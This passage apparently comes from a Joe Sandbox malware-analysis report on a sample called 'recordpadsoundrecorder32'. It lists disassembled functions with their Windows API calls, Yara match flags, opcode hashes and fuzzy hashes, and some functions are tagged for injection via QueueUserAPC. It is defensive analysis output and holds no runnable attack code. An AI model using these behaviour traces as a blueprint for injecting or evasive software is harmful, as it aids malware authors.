                                                                                      • Opcode Fuzzy Hash: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction Fuzzy Hash: 8A517E71A00209EBCF219F94CD45ADF7FB5FB49750F11812AF911B12A0D7398921DF69
                                                                                      Function 00403BE2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403BFD
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C11
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C3D
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C75
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C97
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F74), ref: 00403CB0
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403CC3
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403D01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: t/@
                                                                                      • API String ID: 1823725401-3363397731
                                                                                      • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction ID: 879d38be92084954eaea71e49c87bd85cc2f9a5de8a3f101a3316a48e994b743
                                                                                      • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction Fuzzy Hash: 3E31017350C2246EE7203F746CC483BBE9CEA4575AB15053FF982F3280DA398E8146AD
                                                                                      Function 02603423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603428
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0260346B
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02603472
                                                                                      • GetLastError.KERNEL32 ref: 02603486
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 026034D7
                                                                                      • RtlEnterCriticalSection.NTDLL(00000018), ref: 026034ED
                                                                                      • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02603518
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                      • String ID: CancelIoEx$KERNEL32
                                                                                      • API String ID: 2902213904-434325024
                                                                                      • Opcode ID: d88bb450512ba2e60df053fa6fbb7696af830d3cc2586f95543b12ae7a95f3bc
                                                                                      • Instruction ID: 03da21bba737279fca4420cabea3a95bc262e92f7b7ee91118e24b948827791f
                                                                                      • Opcode Fuzzy Hash: d88bb450512ba2e60df053fa6fbb7696af830d3cc2586f95543b12ae7a95f3bc
                                                                                      • Instruction Fuzzy Hash: 4E31CDB1900615DFDB169F64C984A6FBBF8FF49312F0588A9E8059B380C770D915CFA1
                                                                                      Function 004065B8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004043C1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408584,?,004085D4,?,?,?,Runtime Error!Program: ), ref: 004065CA
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E2
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065F3
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406600
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction ID: db39845ca5f1b339293cd545309a4189fd77c948f0b46f5b4ed21715b02f5541
                                                                                      • Opcode Fuzzy Hash: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction Fuzzy Hash: 46018871A40611EFC7208FB5AFC49277EE99B587407061D3FA541F2291DE7B8811CB6D
                                                                                      Function 0040674E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,00408650,00000001,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 0040678D
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040864C,00000001,?,?,00000000,00000000,00000001), ref: 004067A7
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004067DB
                                                                                      • MultiByteToWideChar.KERNEL32(Wc@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 00406813
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406869
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 0040687B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 3852931651-4128830131
                                                                                      • Opcode ID: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction ID: 956ec2585e1336e719d8d065e8dcf62e24d3c9f54db028b8b8152b0cc77897f4
                                                                                      • Opcode Fuzzy Hash: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction Fuzzy Hash: 3F419F72501209EFCF20AF94DD85EAF3B79FB04754F11453AF902F2290C73989248BA9
                                                                                      Function 0040429D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040430A
                                                                                      • GetStdHandle.KERNEL32(000000F4,00408584,00000000,?,00000000,00000000), ref: 004043E0
                                                                                      • WriteFile.KERNEL32(00000000), ref: 004043E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                      • API String ID: 3784150691-4022980321
                                                                                      • Opcode ID: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction ID: d8635e2a7f81e525e6493e1b235b12eebf94c6aed7416e9ae0bb5a91e3b582aa
                                                                                      • Opcode Fuzzy Hash: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction Fuzzy Hash: ED318572601219AEDF20AA60DE46FDA336CAF85304F1004BFF944B61D1DA78DE448A5D
                                                                                      Function 026115C0 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                      • ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                      • CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3DC92DE0), ref: 0261172A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0261173F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseEventHandle$CreateOpenReset
                                                                                      • String ID:
                                                                                      • API String ID: 1285874450-0
                                                                                      • Opcode ID: c6385ebbd3420ca08ba96497d908fed7daf15dfca9727497b1202ce51d5c9347
                                                                                      • Instruction ID: 25d7a0eb57fb1752a734d7e644e5aa4d164e109d5c5709dca31d75248f50ae5b
                                                                                      • Opcode Fuzzy Hash: c6385ebbd3420ca08ba96497d908fed7daf15dfca9727497b1202ce51d5c9347
                                                                                      • Instruction Fuzzy Hash: C5414070D04358AFDF21CFA5D848BADB7B8EF06724F284259E918EB380D735A945CB90
                                                                                      Function 02602081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 026020AC
                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 026020CD
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026020D8
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0260213E
                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 0260217A
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02602187
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026021A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                      • String ID:
                                                                                      • API String ID: 1171374749-0
                                                                                      • Opcode ID: 3559a0c79921459f848490bbc2b44ad318ab3d7e8ed71516b358ed63e6d8787d
                                                                                      • Instruction ID: d4f80fcb2e7c68abc295b514aaddd381d841cd9c08ff92d9d5bc81a2dfa6cc4f
                                                                                      • Opcode Fuzzy Hash: 3559a0c79921459f848490bbc2b44ad318ab3d7e8ed71516b358ed63e6d8787d
                                                                                      • Instruction Fuzzy Hash: 604149B15047419FC325DF25C889E6BBBF9EFC8754F004A1EA99682290D730E949DF92
                                                                                      Function 026116D2 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 02611E80: OpenEventA.KERNEL32(00100002,00000000,?,?,?,026116DE,?,?), ref: 02611EAF
                                                                                        • Part of subcall function 02611E80: CloseHandle.KERNEL32(00000000,?,?,026116DE,?,?), ref: 02611EC4
                                                                                        • Part of subcall function 02611E80: SetEvent.KERNEL32(00000000,026116DE,?,?), ref: 02611ED7
                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                      • ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                      • CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • __CxxThrowException@8.LIBCMT ref: 026116E5
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3DC92DE0), ref: 0261172A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0261173F
                                                                                        • Part of subcall function 02611BC0: GetCurrentProcessId.KERNEL32(?), ref: 02611C19
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,3DC92DE0), ref: 0261174F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                      • String ID:
                                                                                      • API String ID: 2227236058-0
                                                                                      • Opcode ID: 6ab58aff37cd34d9a51c3fa832742f2fada2ced887b151c11d07f7a888d896ac
                                                                                      • Instruction ID: 159387b07b7a4e939f98fdfd774b662a00d0069d3c82b4c88ee8ab1d8b7edfb5
                                                                                      • Opcode Fuzzy Hash: 6ab58aff37cd34d9a51c3fa832742f2fada2ced887b151c11d07f7a888d896ac
                                                                                      • Instruction Fuzzy Hash: DE317071E003589BDF21DBE4DC49BADB7B9AF06314F2C4259EA1CEB380D721A905CB95
                                                                                      Function 02615D44 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __init_pointers.LIBCMT ref: 02615D44
                                                                                        • Part of subcall function 026184B2: RtlEncodePointer.NTDLL(00000000), ref: 026184B5
                                                                                        • Part of subcall function 026184B2: __initp_misc_winsig.LIBCMT ref: 026184D0
                                                                                        • Part of subcall function 026184B2: GetModuleHandleW.KERNEL32(kernel32.dll,?,02631568,00000008,00000003,02630F4C,?,00000001), ref: 02619231
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02619245
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02619258
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0261926B
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0261927E
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02619291
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 026192A4
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 026192B7
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 026192CA
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 026192DD
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 026192F0
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02619303
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02619316
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02619329
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0261933C
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0261934F
                                                                                      • __mtinitlocks.LIBCMT ref: 02615D49
                                                                                      • __mtterm.LIBCMT ref: 02615D52
                                                                                        • Part of subcall function 02615DBA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026188E8
                                                                                        • Part of subcall function 02615DBA: _free.LIBCMT ref: 026188EF
                                                                                        • Part of subcall function 02615DBA: RtlDeleteCriticalSection.NTDLL(02633978), ref: 02618911
                                                                                      • __calloc_crt.LIBCMT ref: 02615D77
                                                                                      • __initptd.LIBCMT ref: 02615D99
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02615DA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                      • String ID:
                                                                                      • API String ID: 3567560977-0
                                                                                      • Opcode ID: e7f8fa82544ae377b0a1e8643fb076b532ec7abcd6f6bef61c60419edc3359f2
                                                                                      • Instruction ID: 7aae70e8d7d30b37df7746fd55fadd3042045695c72145813b63164ba307fbc8
                                                                                      • Opcode Fuzzy Hash: e7f8fa82544ae377b0a1e8643fb076b532ec7abcd6f6bef61c60419edc3359f2
                                                                                      • Instruction Fuzzy Hash: D2F0C23295A7211AF7247674780A68A7797DB42730F5C461DE462D62C0FF10B4814A4D
                                                                                      Function 02613471 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02613423,00000000), ref: 0261348B
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02613492
                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 0261349E
                                                                                      • RtlDecodePointer.NTDLL(00000001), ref: 026134BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                      • String ID: RoInitialize$combase.dll
                                                                                      • API String ID: 3489934621-340411864
                                                                                      • Opcode ID: 9b8d818f8f10ff13d76d4a3c4a2ec7107fdf0821a40afab9e3f28fc290edd59c
                                                                                      • Instruction ID: 0a74e0f9ad42ef9284a8d4cb579892a221c61e3c892f72a72b510f1778c88148
                                                                                      • Opcode Fuzzy Hash: 9b8d818f8f10ff13d76d4a3c4a2ec7107fdf0821a40afab9e3f28fc290edd59c
                                                                                      • Instruction Fuzzy Hash: FAE0ED70DD4795EAEB211F71ED4EF0D3759AB05706F04A864B502D5284CBB551AC8F14
                                                                                      Function 02613546 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02613460), ref: 02613560
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02613567
                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02613572
                                                                                      • RtlDecodePointer.NTDLL(02613460), ref: 0261358D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                      • API String ID: 3489934621-2819208100
                                                                                      • Opcode ID: 999b048e0cdf8d2855f230bfbb10ff47258669b991278e3348442536e825ca25
                                                                                      • Instruction ID: 29ca7f20a8f6510f34ba79f2c8bb1e1cef69118ad90c3e6afc1f8bf6982d332a
                                                                                      • Opcode Fuzzy Hash: 999b048e0cdf8d2855f230bfbb10ff47258669b991278e3348442536e825ca25
                                                                                      • Instruction Fuzzy Hash: F0E01AB0DD1750EAEB210F60EE0EB0D3668BB00B05F056854B102A1244C77452F8CB24
                                                                                      Function 02611EE0 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • TlsGetValue.KERNEL32(00000026,3DC92DE0,?,?,?,?,00000000,02626A68,000000FF,0261217A), ref: 02611F1A
                                                                                      • TlsSetValue.KERNEL32(00000026,0261217A,?,?,00000000), ref: 02611F87
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02611FB1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 02611FB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HeapValue$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1812714009-0
                                                                                      • Opcode ID: d8ab75fff2fdbdb8e4d492db45b09cc5e3ead796d21f638175109b9f3d6e20a5
                                                                                      • Instruction ID: 0b67001527fcb506dbe39e6d139c5dc4d1698fc1056a76b0e8fc22df6bc8a314
                                                                                      • Opcode Fuzzy Hash: d8ab75fff2fdbdb8e4d492db45b09cc5e3ead796d21f638175109b9f3d6e20a5
                                                                                      • Instruction Fuzzy Hash: 0A51AD719043949FDB20CF29C888F1ABBE5FB4A764F098698E96997390D731FC44CB90
                                                                                      Function 02625630 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 02625740
                                                                                      • __FindPESection.LIBCMT ref: 0262575A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                      • String ID:
                                                                                      • API String ID: 876702719-0
                                                                                      • Opcode ID: 63f21fe4fc28eefc0ccf6bf76f98d8d46e6eb2ef3de44d51e90ff959f26d2e46
                                                                                      • Instruction ID: 82b16ccc952069b716aea3a9edbba417914cd36915632be0e31fe1cdc207e1f6
                                                                                      • Opcode Fuzzy Hash: 63f21fe4fc28eefc0ccf6bf76f98d8d46e6eb2ef3de44d51e90ff959f26d2e46
                                                                                      • Instruction Fuzzy Hash: D6A1A4B1E40A258FDB39CF18C980BADB7A5FB44324F644669DC06AB350E731E949CF90
                                                                                      Function 02601C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02601CB1
                                                                                      • CloseHandle.KERNEL32(?), ref: 02601CBA
                                                                                      • InterlockedExchangeAdd.KERNEL32(02637264,00000000), ref: 02601CC6
                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 02601CD4
                                                                                      • QueueUserAPC.KERNEL32(02601E7C,?,00000000), ref: 02601CE1
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02601CEC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                      • String ID:
                                                                                      • API String ID: 1946104331-0
                                                                                      • Opcode ID: 1da9a297e2ca668bd4b8544aa9610a928366f530b7fe2b02f82d3831019f8878
                                                                                      • Instruction ID: 980467ea5d207772f88b16b00123f766ac1d7bc794f56c94cc6ebe01ea8423fa
                                                                                      • Opcode Fuzzy Hash: 1da9a297e2ca668bd4b8544aa9610a928366f530b7fe2b02f82d3831019f8878
                                                                                      • Instruction Fuzzy Hash: A5F0F471940640BFD7224B95DC0DC5FFBBCEB45720B01469DF52A82190DB70A958CB60
                                                                                      Function 00403EEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F40
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction ID: f9b557e5926ae0cb1bea86ca91105dc92f8de38cdcecb6fe0ade7bda32980430
                                                                                      • Opcode Fuzzy Hash: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction Fuzzy Hash: B6312571D412886DEB319A705C45ADE7F7C8B06309F2400FBE685F62C2E6388FC98B19
                                                                                      Function 026118E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0261192F
                                                                                        • Part of subcall function 02612483: std::exception::_Copy_str.LIBCMT ref: 0261249C
                                                                                        • Part of subcall function 02610D00: __CxxThrowException@8.LIBCMT ref: 02610D5E
                                                                                      • std::exception::exception.LIBCMT ref: 0261198E
                                                                                      Strings
                                                                                      • boost unique_lock has no mutex, xrefs: 0261191E
                                                                                      • boost unique_lock owns already the mutex, xrefs: 0261197D
                                                                                      • $, xrefs: 02611993
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                      • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
